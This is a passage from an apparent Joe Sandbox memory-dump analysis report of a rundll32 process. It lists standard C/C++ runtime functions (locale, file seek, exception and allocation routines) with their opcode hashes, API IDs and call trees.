                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _getptd$_inconsistency$DecodePointer_amsg_exit_getptd_noexit
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3669027769-0
                                                                                                                                                                                • Opcode ID: d84545b744132abf258f2739307021ab7867776e2950de2c885c0764620f8872
                                                                                                                                                                                • Instruction ID: 1957d9e42d7dbf144290f6cd112fc055a6b45e714320b40cdeffc9302539d3ac
                                                                                                                                                                                • Opcode Fuzzy Hash: d84545b744132abf258f2739307021ab7867776e2950de2c885c0764620f8872
                                                                                                                                                                                • Instruction Fuzzy Hash: 07F0FE72309DD080EB62AB95F1813EC53E2A758B98F0D5621EE950F387DE24C491C251
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _getptd$_inconsistency$DestructExceptionObject
                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                • API String ID: 2821275340-1018135373
                                                                                                                                                                                • Opcode ID: 242ad1541a1665e7e88aaf19789ec1deda19dbf05a08f0dcd3087e0f0a85a81f
                                                                                                                                                                                • Instruction ID: 5ebe60bf9697cc786f0e0d654249623bdf4dea9c291f6734f0a1a98cf62872a0
                                                                                                                                                                                • Opcode Fuzzy Hash: 242ad1541a1665e7e88aaf19789ec1deda19dbf05a08f0dcd3087e0f0a85a81f
                                                                                                                                                                                • Instruction Fuzzy Hash: E3016772145AD185EB61BF71E4813ED27E7E75475DF091621DD094A747FF20D885C340
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Exception_callnewh_errno$AllocFileHeaderHeapRaiseThrowmalloc
                                                                                                                                                                                • String ID: bad allocation
                                                                                                                                                                                • API String ID: 1214304046-2104205924
                                                                                                                                                                                • Opcode ID: b642b03be230f377a94fb8bf127ac4337ba363d888bade25789cd85e7bf78fa8
                                                                                                                                                                                • Instruction ID: 75743e2b4b4f2417f4f6469496c22a00e15a351aa0148c6e82f06de40486872d
                                                                                                                                                                                • Opcode Fuzzy Hash: b642b03be230f377a94fb8bf127ac4337ba363d888bade25789cd85e7bf78fa8
                                                                                                                                                                                • Instruction Fuzzy Hash: 82F06DB1209F9B91EF62A751E4007DD63D6E78439CF480624DE4D0BA97EA7CC145CB00
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _wfsopen$fclosefseek
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1261181034-0
                                                                                                                                                                                • Opcode ID: 66608ed3d9a3b7f166453832a9f1b2a902d53ff026ec2d0a3286f5d598873d35
                                                                                                                                                                                • Instruction ID: cffc308e6a219b8b73192189a4b7666edc1994daeb8575b90c56e1e80be9a5eb
                                                                                                                                                                                • Opcode Fuzzy Hash: 66608ed3d9a3b7f166453832a9f1b2a902d53ff026ec2d0a3286f5d598873d35
                                                                                                                                                                                • Instruction Fuzzy Hash: FE31A630255E8D8EE7A8DB1CD4923EA72F2E745308F1C446DDD8BC3292D625DC4286C2
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$LocinfoLocinfo::_$GettnamesLocinfo::~_freemalloc
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 409281135-0
                                                                                                                                                                                • Opcode ID: 0c3ddc91d2b006acc8b60784553b8ba10a7dca4d57a8f93519ec96857e636940
                                                                                                                                                                                • Instruction ID: 7442fb6a470017f0291cefd3dc060f9b2f4d117f01e51d453f77d435ab3993be
                                                                                                                                                                                • Opcode Fuzzy Hash: 0c3ddc91d2b006acc8b60784553b8ba10a7dca4d57a8f93519ec96857e636940
                                                                                                                                                                                • Instruction Fuzzy Hash: E3318171118E498FEBA8DF18C095BEA73F2FB58315F58069E9C4AC72A2DB70D900C781
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$LocinfoLocinfo::_$GettnamesLocinfo::~_freemalloc
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 409281135-0
                                                                                                                                                                                • Opcode ID: b0350cc8b461ada8f143b32dd75d94f1cb74beae973b0a62e1c342981cbefe1a
                                                                                                                                                                                • Instruction ID: 40d0b2744f58b091ab1db829a1bb82898ec624bd94c90db0de53acdbbc6d419d
                                                                                                                                                                                • Opcode Fuzzy Hash: b0350cc8b461ada8f143b32dd75d94f1cb74beae973b0a62e1c342981cbefe1a
                                                                                                                                                                                • Instruction Fuzzy Hash: 38319171118E498FEB69DF18C884BEA73F1FB98319F58069D9849C71A6DB70D800CBC1
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$LocinfoLocinfo::_$GettnamesLocinfo::~_freemalloc
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 409281135-0
                                                                                                                                                                                • Opcode ID: c2fdb474924eb8315d998c80493699ed0ab12c0f657938f58dd9487b9441d48b
                                                                                                                                                                                • Instruction ID: 8d94e7b14f8c788ba64addea60dc945df3c053c502b412456a750b1789e13c28
                                                                                                                                                                                • Opcode Fuzzy Hash: c2fdb474924eb8315d998c80493699ed0ab12c0f657938f58dd9487b9441d48b
                                                                                                                                                                                • Instruction Fuzzy Hash: C7316D71118E498FEBA4DF18D491BEA73F1FB98319F55069D984AC71A2DB74D800CBC1
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Locale_invoke_watson$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_call_reportfault_getptd_malloc_crt
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1584724053-0
                                                                                                                                                                                • Opcode ID: 3daca0f6dc92f9794fddbcc1cdaa0d0f178e51dead4e14673644e8c31eb13f91
                                                                                                                                                                                • Instruction ID: 6cc8a5ca7c2443dbfc936e86ea81311dd46e5b1232b952c91c51a14080b756ab
                                                                                                                                                                                • Opcode Fuzzy Hash: 3daca0f6dc92f9794fddbcc1cdaa0d0f178e51dead4e14673644e8c31eb13f91
                                                                                                                                                                                • Instruction Fuzzy Hash: F1319372758AA582EB169B25D5053DD77E2E785FC8F488225DF490FB8BDE38D0028744
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: fpos$_errno_fseeki64_invalid_parameter_noinfofgetpos
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3188862907-0
                                                                                                                                                                                • Opcode ID: c6c53303b0747acdde5ada9e622c71b4572c09a9b9df7f851f5bf6a1ead528d1
                                                                                                                                                                                • Instruction ID: dac7b88c713ffe26d3e0b0613a83f1e7ec93fe9ad61141aa43d755d62ae68e6b
                                                                                                                                                                                • Opcode Fuzzy Hash: c6c53303b0747acdde5ada9e622c71b4572c09a9b9df7f851f5bf6a1ead528d1
                                                                                                                                                                                • Instruction Fuzzy Hash: D931CF30118A859FD744EB18C485B9E77F2FB99348F58096DF88DC32A2DA75DD41CB42
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: fpos$_fseeki64fgetpos
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1811617113-0
                                                                                                                                                                                • Opcode ID: 4dd5a6bf44b4f08af2fe84d530f4457cc968653dd13fc1324dcdb608c86c5414
                                                                                                                                                                                • Instruction ID: df3df42cf187162e1be4fcb63e9fee05d6d091087d0b41a4a3db332e34579a89
                                                                                                                                                                                • Opcode Fuzzy Hash: 4dd5a6bf44b4f08af2fe84d530f4457cc968653dd13fc1324dcdb608c86c5414
                                                                                                                                                                                • Instruction Fuzzy Hash: F631E030129E858FD794EB18C449BAEB7F2FB99344F44095DE989C32A1C671D841CB42
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _wfsopen$fclosefseek
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1261181034-0
                                                                                                                                                                                • Opcode ID: 66608ed3d9a3b7f166453832a9f1b2a902d53ff026ec2d0a3286f5d598873d35
                                                                                                                                                                                • Instruction ID: a97b2bc8885f108e062ebf925eb554322048f1b6f960467e1c499f230763e15d
                                                                                                                                                                                • Opcode Fuzzy Hash: 66608ed3d9a3b7f166453832a9f1b2a902d53ff026ec2d0a3286f5d598873d35
                                                                                                                                                                                • Instruction Fuzzy Hash: 3821DD31711F9085EB6AC72AD4517EF23E3AB86B9CF188224EF4A47793DA2DC4428740
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_getptd_noexit_invalid_parameter_noinfostrchr
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4151157258-0
                                                                                                                                                                                • Opcode ID: eb64e8c74a50022202f8ee626fe7dbe8f97126340f84a3ce38f6fe5f0cae3986
                                                                                                                                                                                • Instruction ID: 9a5fc0e1182b71ac475bb7339d94f534e8c7d47e6bad3df66ac95c7053a28ae8
                                                                                                                                                                                • Opcode Fuzzy Hash: eb64e8c74a50022202f8ee626fe7dbe8f97126340f84a3ce38f6fe5f0cae3986
                                                                                                                                                                                • Instruction Fuzzy Hash: 6921C37260CAE441FB625756D4903FDA7D2E3C4BDCF184B26EE860A6C7E92CC8618711
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$LocinfoLocinfo::_$GettnamesLocinfo::~_freemalloc
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 409281135-0
                                                                                                                                                                                • Opcode ID: d8e69efa26ad0008533831846f76d24351a0b3f39eb347073c5dfcd3e47a997e
                                                                                                                                                                                • Instruction ID: 464e71166d63abca08d1fe967b9ab23b728ab00994d9832c35f68c62b851ca46
                                                                                                                                                                                • Opcode Fuzzy Hash: d8e69efa26ad0008533831846f76d24351a0b3f39eb347073c5dfcd3e47a997e
                                                                                                                                                                                • Instruction Fuzzy Hash: E5216672309F8086EB26CF15E1503ED73E6F798BA8F844225CE9887396DB78C841C380
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _errno_invalid_parameter_noinfofpos$_fseeki64fgetpos
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1989672365-0
                                                                                                                                                                                • Opcode ID: e02842f5a42da3625d84d50036dede68edc7dbfdcb998bdce8beb25ad7a6383a
                                                                                                                                                                                • Instruction ID: 5a1d0ab0734f02c8b81c8da933e250f38d4d245bdeca3113ce37c7fa052001f1
                                                                                                                                                                                • Opcode Fuzzy Hash: e02842f5a42da3625d84d50036dede68edc7dbfdcb998bdce8beb25ad7a6383a
                                                                                                                                                                                • Instruction Fuzzy Hash: 8431CA76218EC081DB12DB15E49139EABE2F7C5B88F504165EE8C87B6BCF39C5408B40
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$LocinfoLocinfo::_$GettnamesLocinfo::~_freemalloc
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 409281135-0
                                                                                                                                                                                • Opcode ID: 1c985824af1acae9496c5e71a96abd0544d665edfd3f96118f34935afdf6e220
                                                                                                                                                                                • Instruction ID: 03dd242c6f6fb0ef1791dae030108b4e319f47972be3e1e423ed9ac98878acf0
                                                                                                                                                                                • Opcode Fuzzy Hash: 1c985824af1acae9496c5e71a96abd0544d665edfd3f96118f34935afdf6e220
                                                                                                                                                                                • Instruction Fuzzy Hash: B1217532201F8081EB26CF21D4503EE77E6F798BA8F854225DEA847796DB38C942C780
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$LocinfoLocinfo::_$GettnamesLocinfo::~_freemalloc
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 409281135-0
                                                                                                                                                                                • Opcode ID: ee97dc229c5cd99bb1ca05c9355866ee283a5751f5faa2f00eedab80158d67f4
                                                                                                                                                                                • Instruction ID: 0e77dc7026ff5237ff0bed295049b829faff3422ce19bd522666f92098920683
                                                                                                                                                                                • Opcode Fuzzy Hash: ee97dc229c5cd99bb1ca05c9355866ee283a5751f5faa2f00eedab80158d67f4
                                                                                                                                                                                • Instruction Fuzzy Hash: 20216672205F8481EB26CF21D4543DE73E6F798BA8F844265DE9C4779ADB38C946C780
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: fpos$_fseeki64fgetpos
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1811617113-0
                                                                                                                                                                                • Opcode ID: 4dd5a6bf44b4f08af2fe84d530f4457cc968653dd13fc1324dcdb608c86c5414
                                                                                                                                                                                • Instruction ID: ac28024139a8d26f9d1bd5f1cff5e5bfbbcefbab39bcd1e5152cc1ffcee4b3fd
                                                                                                                                                                                • Opcode Fuzzy Hash: 4dd5a6bf44b4f08af2fe84d530f4457cc968653dd13fc1324dcdb608c86c5414
                                                                                                                                                                                • Instruction Fuzzy Hash: 1F31A672608EC481EB51DB15E4813AEA7F2F785B98F500425EE8D47BABCF79C8848B40
                                                                                                                                                                                APIs
                                                                                                                                                                                • std::locale::_Locimp::_New_Locimp.LIBCPMT ref: 000001E51909AFA3
                                                                                                                                                                                  • Part of subcall function 000001E51909B6C0: std::locale::_Locimp::_Locimp.LIBCPMT ref: 000001E51909B6EE
                                                                                                                                                                                • __int64.LIBCPMTD ref: 000001E51909AFBF
                                                                                                                                                                                  • Part of subcall function 000001E519091398: std::_Lockit::_Lockit.LIBCPMT ref: 000001E5190913B3
                                                                                                                                                                                • _aligned_msize.LIBCMTD ref: 000001E51909AFD4
                                                                                                                                                                                  • Part of subcall function 000001E5190914D8: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 000001E5190914FA
                                                                                                                                                                                • codecvt.LIBCPMTD ref: 000001E51909AFDD
                                                                                                                                                                                  • Part of subcall function 000001E519091B18: std::locale::c_str.LIBCPMTD ref: 000001E519091B7A
                                                                                                                                                                                  • Part of subcall function 000001E519091B18: std::_Locinfo::_Locinfo.LIBCPMTD ref: 000001E519091B87
                                                                                                                                                                                  • Part of subcall function 000001E519091B18: collate.LIBCPMTD ref: 000001E519091BB3
                                                                                                                                                                                  • Part of subcall function 000001E519091B18: std::_Locinfo::~_Locinfo.LIBCPMTD ref: 000001E519091BF7
                                                                                                                                                                                  • Part of subcall function 000001E519094778: Concurrency::cancellation_token::_Clear.LIBCPMTD ref: 000001E5190947A0
                                                                                                                                                                                  • Part of subcall function 000001E519094778: malloc.LIBCMT ref: 000001E5190947F9
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Locimp::_std::_std::locale::_$LocimpLocinfo$AddfacClearConcurrency::cancellation_token::_Locimp_Locinfo::_Locinfo::~_LockitLockit::_New___int64_aligned_msizecodecvtcollatemallocstd::locale::c_str
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2541660624-0
                                                                                                                                                                                • Opcode ID: 58eda042d10801f7b57768f629ec788ac31b79f2513f95b0baad2b10f0f1f92d
                                                                                                                                                                                • Instruction ID: 1f68c6c09f8d63f3758b6bfef17e2112fb3f4e93c935447dedea9936231269d9
                                                                                                                                                                                • Opcode Fuzzy Hash: 58eda042d10801f7b57768f629ec788ac31b79f2513f95b0baad2b10f0f1f92d
                                                                                                                                                                                • Instruction Fuzzy Hash: CE11A834228E899FD784EF2CC485B9977F2FB99314F84495DB449C72A1DA74D8448B42
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4141311297.000001E519090000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E519090000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e519090000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Yarn$std::_$LocinfoLocinfo::_std::bad_exception::bad_exception$ExceptionGetcvtLocinfo::~_LockitLockit::_Throwcodecvtstd::locale::facet::facet
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3485682108-0
                                                                                                                                                                                • Opcode ID: 3871120677c23c23d88de505935f11af323c157f0d755e3ee0aa1d801b5552f5
                                                                                                                                                                                • Instruction ID: 17c9ea0cbf80765ae4db288370c8284dc6293265876cfcd4fec005d5504548c5
                                                                                                                                                                                • Opcode Fuzzy Hash: 3871120677c23c23d88de505935f11af323c157f0d755e3ee0aa1d801b5552f5
                                                                                                                                                                                • Instruction Fuzzy Hash: 44011930118B8D8FD7A4EB18D481BDBB3E2FB95304F805A1DA09DC31A1DB7599098B42
                                                                                                                                                                                APIs
                                                                                                                                                                                • std::locale::_Locimp::_New_Locimp.LIBCPMT ref: 000001E51ADEB6FB
                                                                                                                                                                                  • Part of subcall function 000001E51ADEBE18: std::locale::_Locimp::_Locimp.LIBCPMT ref: 000001E51ADEBE46
                                                                                                                                                                                • __int64.LIBCPMTD ref: 000001E51ADEB717
                                                                                                                                                                                  • Part of subcall function 000001E51ADE1AF0: std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADE1B0B
                                                                                                                                                                                  • Part of subcall function 000001E51ADE1AF0: std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADE1B3D
                                                                                                                                                                                • _aligned_msize.LIBCMTD ref: 000001E51ADEB72C
                                                                                                                                                                                  • Part of subcall function 000001E51ADE1C30: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 000001E51ADE1C52
                                                                                                                                                                                • codecvt.LIBCPMTD ref: 000001E51ADEB735
                                                                                                                                                                                  • Part of subcall function 000001E51ADE2270: std::locale::c_str.LIBCPMTD ref: 000001E51ADE22D2
                                                                                                                                                                                  • Part of subcall function 000001E51ADE2270: std::_Locinfo::_Locinfo.LIBCPMTD ref: 000001E51ADE22DF
                                                                                                                                                                                  • Part of subcall function 000001E51ADE2270: collate.LIBCPMTD ref: 000001E51ADE230B
                                                                                                                                                                                  • Part of subcall function 000001E51ADE2270: std::_Locinfo::~_Locinfo.LIBCPMTD ref: 000001E51ADE234F
                                                                                                                                                                                  • Part of subcall function 000001E51ADE4ED0: Concurrency::cancellation_token::_Clear.LIBCPMTD ref: 000001E51ADE4EF8
                                                                                                                                                                                  • Part of subcall function 000001E51ADE4ED0: malloc.LIBCMT ref: 000001E51ADE4F51
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4142231507.000001E51ADE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001E51ADE0000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.4142231507.000001E51AE88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1e51ade0000_rundll32.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Locimp::_std::locale::_$LocimpLocinfoLockit$AddfacClearConcurrency::cancellation_token::_Locimp_Locinfo::_Locinfo::~_Lockit::_Lockit::~_New___int64_aligned_msizecodecvtcollatemallocstd::locale::c_str
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1811419688-0
                                                                                                                                                                                • Opcode ID: 7af322f36f17e67862f741fc24bfc0139ff588b013d2130c712c45a990bd171e
                                                                                                                                                                                • Instruction ID: 91733621338c9b5440a44037705cbb496057970387940145dc0a109911d6e5bd
                                                                                                                                                                                • Opcode Fuzzy Hash: 7af322f36f17e67862f741fc24bfc0139ff588b013d2130c712c45a990bd171e
                                                                                                                                                                                • Instruction Fuzzy Hash: 38012936215F8481DB41EB2AE49139E73A2F7C8B94F409612FE9E037ABCF38C0958740
                                                                                                                                                                                APIs
                                                                                                                                                                                • std::bad_exception::bad_exception.LIBCMTD ref: 000001E51ADE21AA
                                                                                                                                                                                  • Part of subcall function 000001E51ADE1F60: std::locale::facet::facet.LIBCPMTD ref: 000001E51ADE1F78
                                                                                                                                                                                • std::_Locinfo::_Locinfo.LIBCPMTD ref: 000001E51ADE21CE
                                                                                                                                                                                  • Part of subcall function 000001E51ADE17E0: std::_Lockit::_Lockit.LIBCPMT ref: 000001E51ADE1801
                                                                                                                                                                                  • Part of subcall function 000001E51ADE17E0: _Yarn.LIBCPMTD ref: 000001E51ADE1813
                                                                                                                                                                                  • Part of subcall function 000001E51ADE17E0: _Yarn.LIBCPMTD ref: 000001E51ADE1825
                                                                                                                                                                                  • Part of subcall function 000001E51ADE17E0: _Yarn.LIBCPMTD ref: 000001E51ADE1837
                                                                                                                                                                                  • Part of subcall function 000001E51ADE17E0: _Yarn.LIBCPMTD ref: 000001E51ADE1849
                                                                                                                                                                                  • Part of subcall function 000001E51ADE17E0: _Yarn.LIBCPMTD ref: 000001E51ADE185B
                                                                                                                                                                                  • Part of subcall function 000001E51ADE17E0: _Yarn.LIBCPMTD ref: 000001E51ADE186D
                                                                                                                                                                                  • Part of subcall function 000001E51ADE17E0: std::bad_exception::bad_exception.LIBCMTD ref: 000001E51ADE1887
                                                                                                                                                                                  • Part of subcall function 000001E51ADE17E0: _CxxThrowException.LIBCMT ref: 000001E51ADE1898
                                                                                                                                                                                  • Part of subcall function 000001E51ADE17E0: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 000001E51ADE18A7
                                                                                                                                                                                • codecvt.LIBCPMTD ref: 000001E51ADE21E1
                                                                                                                                                                                  • Part of subcall function 000001E51ADE23A0: std::_Locinfo::_Getcvt.LIBCPMTD ref: 000001E51ADE23CC
                                                                                                                                                                                • std::_Locinfo::~_Locinfo.LIBCPMTD ref: 000001E51ADE21EC
                                                                                                                                                                                  • Part of subcall function 000001E51ADE18C0: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 000001E51ADE18CE
                                                                                                                                                                                  • Part of subcall function 000001E51ADE18C0: std::_Lockit::~_Lockit.LIBCPMT ref: 000001E51ADE1941
                                                                                                                                                                                Memory Dump Source
